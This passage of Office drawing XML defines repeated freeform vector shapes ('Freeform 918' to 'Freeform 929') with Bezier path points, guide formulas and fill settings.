                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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70" name="Freeform 918">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C454C621-F60D-4323-8BF8-B0D480BACF3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86" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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71" name="Freeform 919">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D209B09-6A40-4A6C-889B-7EB399436C1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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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72" name="Freeform 920">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50AE1E5E-759D-4006-8928-11474406161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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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73" name="Freeform 921">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AA2E5C7-7BC6-4F27-9B44-AF5E8F6830F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938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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74" name="Freeform 922">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10CB87E7-1452-43F3-92A4-17FA8CD37FA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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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75" name="Freeform 923">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EA090C-3CC3-4689-9907-605D8EB6B3A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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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76" name="Freeform 924">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276AEC45-344E-479A-9CEF-822C274A671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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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77" name="Freeform 925">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA0AAFD-F435-4652-8CB9-E1C92250579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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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78" name="Freeform 926">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7DEB18-3D13-4DD3-A0AC-9D3B20EED90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86" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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79" name="Freeform 927">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDEB08E-38AE-4116-9F27-8E64477E7F6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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1"/>
                      </a:cubicBezTo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80" name="Freeform 928">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4D172F-FD1E-408B-8B20-10E63AB8551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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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81" name="Freeform 929">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{110937E6-CBF1-4A41-A905-B7166BD4323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938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
